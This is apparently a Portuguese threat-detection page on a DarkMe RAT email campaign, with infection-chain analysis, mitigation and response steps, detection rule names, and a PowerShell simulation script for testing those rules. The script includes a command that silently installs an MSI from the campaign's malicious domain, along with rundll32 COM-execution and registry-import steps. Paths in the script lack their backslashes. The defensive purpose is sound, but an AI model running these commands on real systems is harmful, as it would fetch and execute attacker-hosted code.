Campanha de E-mail do DarkMe Amplia Alvos em Ataques APT RAT
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma nova campanha distribuindo o spyware RAT DarkMe foi observada utilizando engenharia social em vez de exploits de software. Os atacantes distribuem um .pif arquivo através de e-mail, o qual inicia uma cadeia de infecção em múltiplos estágios envolvendo MSIEXEC e vários carregadores baseados em VB6. A mudança do aproveitamento de dia-zero para engenharia social em grande escala sugere uma transição para métodos de ataque mais baratos, amplos e menos seletivos.
Investigação
A Huntress identificou a campanha após detectar um .pif arquivo que lançava o Windows Installer para recuperar um pacote MSI remoto. A análise revelou uma cadeia complexa em múltiplos estágios envolvendo um script de níveis chamado prnfig.wsf, importações de registro, e execução de um objeto COM através do rundll32.exe /sta. O estágio final utiliza esvaziamento de processo para injetar o payload DarkMe no binário assinado da Microsoft clspack.exe.
Mitigação
Os defensores devem monitorar o rundll32.exe lançado com o /sta sinalizador e um GUID sem um caminho de DLL correspondente. As equipes de segurança devem também detectar msiexec recuperando pacotes MSI remotos sobre HTTPS e investigar a execução de .pif arquivos. Binários assinados pela Microsoft executados de locais incomuns, como %AppData% devem receber atenção adicional.
Resposta
Quando atividade suspeita for detectada, isole imediatamente o endpoint afetado para interromper a comunicação C2 e prevenir a exfiltração de dados. Termine o clspack.exe processo esvaziado e remova artefatos maliciosos de %AppData%ComponentsFolder and %AppData%Microsoft. Remova persistência criada através do manipulador de protocolo personalizado de URL e da chave HKCU Run . Redefina as credenciais de usuários afetados e trate qualquer carteira de criptomoedas armazenada localmente como potencialmente comprometida.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Possíveis Pontos de Persistência [ASEPs – Software/NTUSER Hive] (via registry_event)
Extensão Incomum de Binário Executável (via process_creation)
LOLBAS WScript / CScript (via process_creation)
Possível Tentativa de Instalação de Arquivo MSI Remoto (via cmdline)
Comando e Controle Suspeito por Solicitação de DNS de Domínio de Alto Nível Incomum (TLD) (via dns)
IOCs (HashSha256) para detectar: Campanha de Email DarkMe ampliação de Alvos para APT RAT
IOCs (SourceIP) para detectar: Campanha de Email DarkMe ampliação de Alvos para APT RAT
IOCs (DestinationIP) para detectar: Campanha de Email DarkMe ampliação de Alvos para APT RAT
Detectar Comunicação C2 e Estágio de Domínio para DarkMe RAT [Conexão de Rede Windows]
Detecção de Atividades Maliciosas da Campanha DarkMe RAT [Criação de Processo Windows]
Execução de Simulação
-
Narrativa e Comandos de Ataque: O adversário visa implantar o RAT DarkMe para manter a persistência. Para evadir a detecção baseada em assinatura, o atacante utiliza
msiexecpara puxar um payload remoto de um domínio comprometido (onlineview365.com). Após a infecção inicial, o atacante utilizarundll32.exepara invocar um objeto COM específico via um GUID para executar código na memória, e subsequentemente utilizacmd.exepara importar configurações de registro de um arquivo de texto para preparar o ambiente para a execução de um payload baseado emwscript.exe. -
Script de Teste de Regressão:
# Script de Simulação DarkMe RAT # Este script simula as linhas de comando exatas definidas na regra Sigma. Write-Host "[+] Iniciando Simulação DarkMe RAT..." -ForegroundColor Cyan # 1. Simular download remoto do msiexec Write-Host "[*] Simulando download remoto do msiexec..." Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue # 2. Simular execução de objeto COM do rundll32 Write-Host "[*] Simulando execução de COM do rundll32..." Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue # 3. Simular importação de registro cmd.exe Write-Host "[*] Simulando importação de registro cmd.exe..." $tempFile = "$env:TEMPfiletext2.txt" "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait # 4. Simular execução de wscript.exe via cadeia de pais cmd/rundll32 Write-Host "[*] Simulando execução de wscript.exe de AppData..." $scriptPath = "$env:APPDATAscript_malicioso.vbs" "WScript.Echo `"DarkMe Simulado`"" | Out-File -FilePath $scriptPath -Encoding ascii # Para acionar a regra específica de pai/filho: # Pai: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} # Filho: wscript.exe %AppData%script_malicioso.vbs Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait Write-Host "[+] Simulação Completa." -ForegroundColor Green -
Comandos de Limpeza:
# Limpeza de Artefatos de Simulação Write-Host "[+] Limpando..." -ForegroundColor Yellow Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAscript_malicioso.vbs" -ErrorAction SilentlyContinue Write-Host "[+] Limpeza Concluída." -ForegroundColor Green